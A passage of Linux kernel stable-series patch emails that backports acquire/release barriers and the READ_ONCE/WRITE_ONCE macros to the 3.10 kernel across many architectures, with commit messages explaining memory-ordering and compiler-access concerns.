+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #else
+
 #define smp_mb()	asm volatile("dmb ish" : : : "memory")
 #define smp_rmb()	asm volatile("dmb ishld" : : : "memory")
 #define smp_wmb()	asm volatile("dmb ishst" : : : "memory")
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	switch (sizeof(*p)) {						\
+	case 4:								\
+		asm volatile ("stlr %w1, %0"				\
+				: "=Q" (*p) : "r" (v) : "memory");	\
+		break;							\
+	case 8:								\
+		asm volatile ("stlr %1, %0"				\
+				: "=Q" (*p) : "r" (v) : "memory");	\
+		break;							\
+	}								\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1;						\
+	compiletime_assert_atomic_type(*p);				\
+	switch (sizeof(*p)) {						\
+	case 4:								\
+		asm volatile ("ldar %w0, %1"				\
+			: "=r" (___p1) : "Q" (*p) : "memory");		\
+		break;							\
+	case 8:								\
+		asm volatile ("ldar %0, %1"				\
+			: "=r" (___p1) : "Q" (*p) : "memory");		\
+		break;							\
+	}								\
+	___p1;								\
+})
+
 #endif
 
 #define read_barrier_depends()		do { } while(0)
diff --git a/arch/ia64/include/asm/barrier.h b/arch/ia64/include/asm/barrier.h
index 60576e0..d0a69aa 100644
--- a/arch/ia64/include/asm/barrier.h
+++ b/arch/ia64/include/asm/barrier.h
@@ -45,14 +45,37 @@
 # define smp_rmb()	rmb()
 # define smp_wmb()	wmb()
 # define smp_read_barrier_depends()	read_barrier_depends()
+
 #else
+
 # define smp_mb()	barrier()
 # define smp_rmb()	barrier()
 # define smp_wmb()	barrier()
 # define smp_read_barrier_depends()	do { } while(0)
+
 #endif
 
 /*
+ * IA64 GCC turns volatile stores into st.rel and volatile loads into ld.acq no
+ * need for asm trickery!
+ */
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
+/*
  * XXX check on this ---I suspect what Linus really wants here is
  * acquire vs release semantics but we can't discuss this stuff with
  * Linus just yet.  Grrr...
diff --git a/arch/metag/include/asm/barrier.h b/arch/metag/include/asm/barrier.h
index e355a4c..2d6f0de 100644
--- a/arch/metag/include/asm/barrier.h
+++ b/arch/metag/include/asm/barrier.h
@@ -85,4 +85,19 @@ static inline void fence(void)
 #define smp_read_barrier_depends()     do { } while (0)
 #define set_mb(var, value) do { var = value; smp_mb(); } while (0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #endif /* _ASM_METAG_BARRIER_H */
diff --git a/arch/mips/include/asm/barrier.h b/arch/mips/include/asm/barrier.h
index 314ab55..52c5b61 100644
--- a/arch/mips/include/asm/barrier.h
+++ b/arch/mips/include/asm/barrier.h
@@ -180,4 +180,19 @@
 #define nudge_writes() mb()
 #endif
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #endif /* __ASM_BARRIER_H */
diff --git a/arch/powerpc/include/asm/barrier.h b/arch/powerpc/include/asm/barrier.h
index ae78225..f89da80 100644
--- a/arch/powerpc/include/asm/barrier.h
+++ b/arch/powerpc/include/asm/barrier.h
@@ -45,11 +45,15 @@
 #    define SMPWMB      eieio
 #endif
 
+#define __lwsync()	__asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+
 #define smp_mb()	mb()
-#define smp_rmb()	__asm__ __volatile__ (stringify_in_c(LWSYNC) : : :"memory")
+#define smp_rmb()	__lwsync()
 #define smp_wmb()	__asm__ __volatile__ (stringify_in_c(SMPWMB) : : :"memory")
 #define smp_read_barrier_depends()	read_barrier_depends()
 #else
+#define __lwsync()	barrier()
+
 #define smp_mb()	barrier()
 #define smp_rmb()	barrier()
 #define smp_wmb()	barrier()
@@ -65,4 +69,19 @@
 #define data_barrier(x)	\
 	asm volatile("twi 0,%0,0; isync" : : "r" (x) : "memory");
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	__lwsync();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	__lwsync();							\
+	___p1;								\
+})
+
 #endif /* _ASM_POWERPC_BARRIER_H */
diff --git a/arch/s390/include/asm/barrier.h b/arch/s390/include/asm/barrier.h
index 16760ee..578680f 100644
--- a/arch/s390/include/asm/barrier.h
+++ b/arch/s390/include/asm/barrier.h
@@ -32,4 +32,19 @@
 
 #define set_mb(var, value)		do { var = value; mb(); } while (0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
 #endif /* __ASM_BARRIER_H */
diff --git a/arch/sparc/include/asm/barrier_64.h b/arch/sparc/include/asm/barrier_64.h
index 95d4598..b5aad96 100644
--- a/arch/sparc/include/asm/barrier_64.h
+++ b/arch/sparc/include/asm/barrier_64.h
@@ -53,4 +53,19 @@ do {	__asm__ __volatile__("ba,pt	%%xcc, 1f\n\t" \
 
 #define smp_read_barrier_depends()	do { } while(0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
 #endif /* !(__SPARC64_BARRIER_H) */
diff --git a/arch/x86/include/asm/barrier.h b/arch/x86/include/asm/barrier.h
index c6cd358..04a4890 100644
--- a/arch/x86/include/asm/barrier.h
+++ b/arch/x86/include/asm/barrier.h
@@ -92,12 +92,53 @@
 #endif
 #define smp_read_barrier_depends()	read_barrier_depends()
 #define set_mb(var, value) do { (void)xchg(&var, value); } while (0)
-#else
+#else /* !SMP */
 #define smp_mb()	barrier()
 #define smp_rmb()	barrier()
 #define smp_wmb()	barrier()
 #define smp_read_barrier_depends()	do { } while (0)
 #define set_mb(var, value) do { var = value; barrier(); } while (0)
+#endif /* SMP */
+
+#if defined(CONFIG_X86_OOSTORE) || defined(CONFIG_X86_PPRO_FENCE)
+
+/*
+ * For either of these options x86 doesn't have a strong TSO memory
+ * model and we should fall back to full barriers.
+ */
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
+#else /* regular x86 TSO memory ordering */
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	barrier();							\
+	___p1;								\
+})
+
 #endif
 
 /*
diff --git a/include/asm-generic/barrier.h b/include/asm-generic/barrier.h
index 639d7a4..01613b3 100644
--- a/include/asm-generic/barrier.h
+++ b/include/asm-generic/barrier.h
@@ -46,5 +46,20 @@
 #define read_barrier_depends()		do {} while (0)
 #define smp_read_barrier_depends()	do {} while (0)
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #endif /* !__ASSEMBLY__ */
 #endif /* __ASM_GENERIC_BARRIER_H */
diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index a2ce6f8..6977192 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -302,6 +302,11 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 # define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
 #endif
 
+/* Is this type a native word size -- useful for atomic operations */
+#ifndef __native_word
+# define __native_word(t) (sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))
+#endif
+
 /* Compile time object size, -1 for unknown */
 #ifndef __compiletime_object_size
 # define __compiletime_object_size(obj) -1
@@ -341,6 +346,10 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 #define compiletime_assert(condition, msg) \
 	_compiletime_assert(condition, msg, __compiletime_assert_, __LINE__)
 
+#define compiletime_assert_atomic_type(t)				\
+	compiletime_assert(__native_word(t),				\
+		"Need native word sized stores/loads for atomicity.")
+
 /*
  * Prevent the compiler from merging or refetching accesses.  The compiler
  * is also forbidden from reordering successive instances of ACCESS_ONCE(),
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (175 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
                   ` (41 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger, Willy Tarreau

From: Christian Borntraeger <borntraeger@de.ibm.com>

commit 230fa253df6352af12ad0a16128760b5cb3f92df upstream.

ACCESS_ONCE does not work reliably on non-scalar types. For
example gcc 4.6 and 4.7 might remove the volatile tag for such
accesses during the SRA (scalar replacement of aggregates) step
(https://gcc.gnu.org/bugzilla/show_bug.cgi?id=58145).

Let's provide READ_ONCE/ASSIGN_ONCE that will do all accesses via
scalar types as suggested by Linus Torvalds. Accesses larger than
the machine's word size cannot be guaranteed to be atomic. These
macros will use memcpy and emit a build warning.
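
The idea of routing every access through a scalar volatile type can be
sketched in userspace roughly as follows.  read_once_size() is a
hypothetical stand-in for the patch's __read_once_size(), it uses
<stdint.h> types instead of __u8..__u64, and it leaves out the
compile-time warning and the barrier() calls of the kernel version:

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical userspace stand-in for the patch's __read_once_size(). */
static inline void read_once_size(const volatile void *p, void *res, size_t size)
{
	switch (size) {
	/* Scalar sizes: one volatile load of exactly that width. */
	case 1: *(uint8_t *)res = *(const volatile uint8_t *)p; break;
	case 2: *(uint16_t *)res = *(const volatile uint16_t *)p; break;
	case 4: *(uint32_t *)res = *(const volatile uint32_t *)p; break;
	case 8: *(uint64_t *)res = *(const volatile uint64_t *)p; break;
	default:
		/* Anything else: plain copy, with no atomicity implied. */
		memcpy(res, (const void *)p, size);
	}
}
```

Because the switch is on a compile-time constant size, an inlining
compiler can be expected to reduce each call to a single load for the
scalar cases.  The sketch is only meant for objects whose own type
matches the access width; the kernel is built with -fno-strict-aliasing,
which a userspace build may not be.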

Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 74 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 74 insertions(+)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 6977192..9df1978 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -179,6 +179,80 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 # define __UNIQUE_ID(prefix) __PASTE(__PASTE(__UNIQUE_ID_, prefix), __LINE__)
 #endif
 
+#include <uapi/linux/types.h>
+
+static __always_inline void data_access_exceeds_word_size(void)
+#ifdef __compiletime_warning
+__compiletime_warning("data access exceeds word size and won't be atomic")
+#endif
+;
+
+static __always_inline void data_access_exceeds_word_size(void)
+{
+}
+
+static __always_inline void __read_once_size(volatile void *p, void *res, int size)
+{
+	switch (size) {
+	case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
+	case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
+	case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
+#ifdef CONFIG_64BIT
+	case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
+#endif
+	default:
+		barrier();
+		__builtin_memcpy((void *)res, (const void *)p, size);
+		data_access_exceeds_word_size();
+		barrier();
+	}
+}
+
+static __always_inline void __assign_once_size(volatile void *p, void *res, int size)
+{
+	switch (size) {
+	case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
+	case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
+	case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
+#ifdef CONFIG_64BIT
+	case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
+#endif
+	default:
+		barrier();
+		__builtin_memcpy((void *)p, (const void *)res, size);
+		data_access_exceeds_word_size();
+		barrier();
+	}
+}
+
+/*
+ * Prevent the compiler from merging or refetching reads or writes. The
+ * compiler is also forbidden from reordering successive instances of
+ * READ_ONCE, ASSIGN_ONCE and ACCESS_ONCE (see below), but only when the
+ * compiler is aware of some particular ordering.  One way to make the
+ * compiler aware of ordering is to put the two invocations of READ_ONCE,
+ * ASSIGN_ONCE or ACCESS_ONCE() in different C statements.
+ *
+ * In contrast to ACCESS_ONCE these two macros will also work on aggregate
+ * data types like structs or unions. If the size of the accessed data
+ * type exceeds the word size of the machine (e.g., 32 bits or 64 bits)
+ * READ_ONCE() and ASSIGN_ONCE()  will fall back to memcpy and print a
+ * compile-time warning.
+ *
+ * Their two major use cases are: (1) Mediating communication between
+ * process-level code and irq/NMI handlers, all running on the same CPU,
+ * and (2) Ensuring that the compiler does not  fold, spindle, or otherwise
+ * mutilate accesses that either do not require ordering or that interact
+ * with an explicit memory barrier or atomic instruction that provides the
+ * required ordering.
+ */
+
+#define READ_ONCE(x) \
+	({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
+
+#define ASSIGN_ONCE(val, x) \
+	({ typeof(x) __val; __val = val; __assign_once_size(&x, &__val, sizeof(__val)); __val; })
+
 #endif /* __KERNEL__ */
 
 #endif /* __ASSEMBLY__ */
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val)
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (176 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
                   ` (40 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Christian Borntraeger, Willy Tarreau

From: Christian Borntraeger <borntraeger@de.ibm.com>

commit 43239cbe79fc369f5d2160bd7f69e28b5c50a58c upstream.

Feedback has shown that WRITE_ONCE(x, val) is easier to use than
ASSIGN_ONCE(val,x).
There are no in-tree users yet, so let's change it for 3.19.
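
The new argument order mirrors a plain assignment, destination first.
A minimal userspace sketch, assuming GCC or Clang for __typeof__ and
using the hypothetical name MY_WRITE_ONCE (a simple volatile-cast macro,
not the patch's size-switching helper):

```c
/* Hypothetical macro: a volatile store with the destination first. */
#define MY_WRITE_ONCE(x, val) \
	(*(volatile __typeof__(x) *)&(x) = (val))

static int ready_flag;

static void publish_ready(void)
{
	/* Reads like "ready_flag = 1", only forced to be a real store. */
	MY_WRITE_ONCE(ready_flag, 1);
}
```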

Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com>
Acked-by: Peter Zijlstra <peterz@infradead.org>
Acked-by: Davidlohr Bueso <dave@stgolabs.net>
Acked-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 9df1978..236a4e3 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -208,7 +208,7 @@ static __always_inline void __read_once_size(volatile void *p, void *res, int si
 	}
 }
 
-static __always_inline void __assign_once_size(volatile void *p, void *res, int size)
+static __always_inline void __write_once_size(volatile void *p, void *res, int size)
 {
 	switch (size) {
 	case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
@@ -228,15 +228,15 @@ static __always_inline void __assign_once_size(volatile void *p, void *res, int
 /*
  * Prevent the compiler from merging or refetching reads or writes. The
  * compiler is also forbidden from reordering successive instances of
- * READ_ONCE, ASSIGN_ONCE and ACCESS_ONCE (see below), but only when the
+ * READ_ONCE, WRITE_ONCE and ACCESS_ONCE (see below), but only when the
  * compiler is aware of some particular ordering.  One way to make the
  * compiler aware of ordering is to put the two invocations of READ_ONCE,
- * ASSIGN_ONCE or ACCESS_ONCE() in different C statements.
+ * WRITE_ONCE or ACCESS_ONCE() in different C statements.
  *
  * In contrast to ACCESS_ONCE these two macros will also work on aggregate
  * data types like structs or unions. If the size of the accessed data
  * type exceeds the word size of the machine (e.g., 32 bits or 64 bits)
- * READ_ONCE() and ASSIGN_ONCE()  will fall back to memcpy and print a
+ * READ_ONCE() and WRITE_ONCE()  will fall back to memcpy and print a
  * compile-time warning.
  *
  * Their two major use cases are: (1) Mediating communication between
@@ -250,8 +250,8 @@ static __always_inline void __assign_once_size(volatile void *p, void *res, int
 #define READ_ONCE(x) \
 	({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
 
-#define ASSIGN_ONCE(val, x) \
-	({ typeof(x) __val; __val = val; __assign_once_size(&x, &__val, sizeof(__val)); __val; })
+#define WRITE_ONCE(x, val) \
+	({ typeof(x) __val; __val = val; __write_once_size(&x, &__val, sizeof(__val)); __val; })
 
 #endif /* __KERNEL__ */
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (177 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 278/319] kernel: Change ASSIGN_ONCE(val, x) to WRITE_ONCE(x, val) Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:05   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
                   ` (39 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Linus Torvalds, Christian Borntraeger, Willy Tarreau

From: Linus Torvalds <torvalds@linux-foundation.org>

commit dd36929720f40f17685e841ae0d4c581c165ea60 upstream.

The use of READ_ONCE() causes lots of warnings with the pending paravirt
spinlock fixes, because those end up passing a member of a 'const'
structure to READ_ONCE().

There should certainly be nothing wrong with using READ_ONCE() with a
const source, but the helper function __read_once_size() would cause
warnings because it would drop the 'const' qualifier, but also because
the destination would be marked 'const' too due to the use of 'typeof'.

Use a union of types in READ_ONCE() to avoid this issue.

Also make sure to use parentheses around the macro arguments to avoid
possible operator precedence issues.
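
The effect of the union can be sketched in userspace as below, assuming
GCC or Clang (for __typeof__ and statement expressions).  MY_READ_ONCE,
read_size(), struct ticket and ticket_head() are hypothetical names; the
helper is reduced to a memcpy, and the byte array is sized with
sizeof(x) here rather than the patch's char __c[1], purely to keep
userspace compiler diagnostics quiet:

```c
#include <string.h>

/* Hypothetical, simplified stand-in for __read_once_size(). */
static inline void read_size(const volatile void *p, void *res, size_t size)
{
	memcpy(res, (const void *)p, size);
}

/*
 * With a const source, __typeof__(x) is const-qualified, so a plain
 * "__typeof__(x) val;" could not be filled in.  The byte array in the
 * union is not const, so the helper can write through it.
 */
#define MY_READ_ONCE(x) \
	({ union { __typeof__(x) val; unsigned char c[sizeof(x)]; } u; \
	   read_size(&(x), u.c, sizeof(x)); u.val; })

struct ticket { int head; int tail; };

static int ticket_head(const struct ticket *t)
{
	/* t->head has type 'const int'; this still compiles cleanly. */
	return MY_READ_ONCE(t->head);
}
```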

Tested-by: Ingo Molnar <mingo@kernel.org>
Cc: Christian Borntraeger <borntraeger@de.ibm.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 236a4e3..c6d06e9 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -191,7 +191,7 @@ static __always_inline void data_access_exceeds_word_size(void)
 {
 }
 
-static __always_inline void __read_once_size(volatile void *p, void *res, int size)
+static __always_inline void __read_once_size(const volatile void *p, void *res, int size)
 {
 	switch (size) {
 	case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
@@ -248,10 +248,10 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
  */
 
 #define READ_ONCE(x) \
-	({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
+	({ union { typeof(x) __val; char __c[1]; } __u; __read_once_size(&(x), __u.__c, sizeof(x)); __u.__val; })
 
 #define WRITE_ONCE(x, val) \
-	({ typeof(x) __val; __val = val; __write_once_size(&x, &__val, sizeof(__val)); __val; })
+	({ typeof(x) __val = (val); __write_once_size(&(x), &__val, sizeof(__val)); __val; })
 
 #endif /* __KERNEL__ */
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (178 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 279/319] kernel: make READ_ONCE() valid on const arguments Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:05   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release() Willy Tarreau
                   ` (38 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Davidlohr Bueso, H . Peter Anvin, Paul McKenney,
	Stephen Rothwell, Thomas Gleixner, Ingo Molnar, Willy Tarreau

From: Peter Zijlstra <peterz@infradead.org>

commit 7bd3e239d6c6d1cad276e8f130b386df4234dcd7 upstream.

The fact that volatile allows for atomic load/stores is a special case,
not a requirement for {READ,WRITE}_ONCE(). Their primary purpose is to
force the compiler to emit load/stores _once_.

Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Acked-by: Christian Borntraeger <borntraeger@de.ibm.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Acked-by: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Davidlohr Bueso <dave@stgolabs.net>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Paul McKenney <paulmck@linux.vnet.ibm.com>
Cc: Stephen Rothwell <sfr@canb.auug.org.au>
Cc: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/compiler.h | 16 ----------------
 1 file changed, 16 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index c6d06e9..53563d8 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -181,29 +181,16 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
 
 #include <uapi/linux/types.h>
 
-static __always_inline void data_access_exceeds_word_size(void)
-#ifdef __compiletime_warning
-__compiletime_warning("data access exceeds word size and won't be atomic")
-#endif
-;
-
-static __always_inline void data_access_exceeds_word_size(void)
-{
-}
-
 static __always_inline void __read_once_size(const volatile void *p, void *res, int size)
 {
 	switch (size) {
 	case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
 	case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
 	case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
-#ifdef CONFIG_64BIT
 	case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
-#endif
 	default:
 		barrier();
 		__builtin_memcpy((void *)res, (const void *)p, size);
-		data_access_exceeds_word_size();
 		barrier();
 	}
 }
@@ -214,13 +201,10 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
 	case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
 	case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
 	case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
-#ifdef CONFIG_64BIT
 	case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
-#endif
 	default:
 		barrier();
 		__builtin_memcpy((void *)p, (const void *)res, size);
-		data_access_exceeds_word_size();
 		barrier();
 	}
 }
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 281/319] compiler: Allow 1- and 2-byte smp_load_acquire() and smp_store_release()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (179 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 280/319] locking: Remove atomicy checks from {READ,WRITE}_ONCE Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:05   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
                   ` (37 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Paul E. McKenney, Peter Zijlstra, Willy Tarreau

From: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>

commit 536fa402221f09633e7c5801b327055ab716a363 upstream.

CPUs without single-byte and double-byte loads and stores place some
"interesting" requirements on concurrent code.  For example (adapted
from Peter Hurley's test code), suppose we have the following structure:

	struct foo {
		spinlock_t lock1;
		spinlock_t lock2;
		char a; /* Protected by lock1. */
		char b; /* Protected by lock2. */
	};
	struct foo *foop;

Of course, it is common (and good) practice to place data protected
by different locks in separate cache lines.  However, if the locks are
rarely acquired (for example, only in rare error cases), and there are
a great many instances of the data structure, then memory footprint can
trump false-sharing concerns, so that it can be better to place them in
the same cache line as above.

But if the CPU does not support single-byte loads and stores, a store
to foop->a will do a non-atomic read-modify-write operation on foop->b,
which will come as a nasty surprise to someone holding foop->lock2.  So we
now require CPUs to support single-byte and double-byte loads and stores.
Therefore, this commit adjusts the definition of __native_word() to allow
these sizes to be used by smp_load_acquire() and smp_store_release().
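
The widened size test can be tried out in userspace with C11
_Static_assert.  The macro below repeats the new __native_word()
expression under the hypothetical name native_word(); struct triple is
likewise made up for illustration and is assumed to be 3 bytes, as it is
on common ABIs:

```c
#include <stdint.h>

/* Same size test as the updated __native_word(), renamed for userspace. */
#define native_word(t) \
	(sizeof(t) == sizeof(char) || sizeof(t) == sizeof(short) || \
	 sizeof(t) == sizeof(int) || sizeof(t) == sizeof(long))

struct triple { char bytes[3]; };	/* 3 bytes: not a native word size */

_Static_assert(native_word(char), "1-byte accesses are now accepted");
_Static_assert(native_word(uint16_t), "2-byte accesses are now accepted");
_Static_assert(native_word(long), "word-sized accesses still pass");
_Static_assert(!native_word(struct triple), "odd sizes are still rejected");
```

Note that the check looks at size only, so any type whose size happens
to match one of the four passes it.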

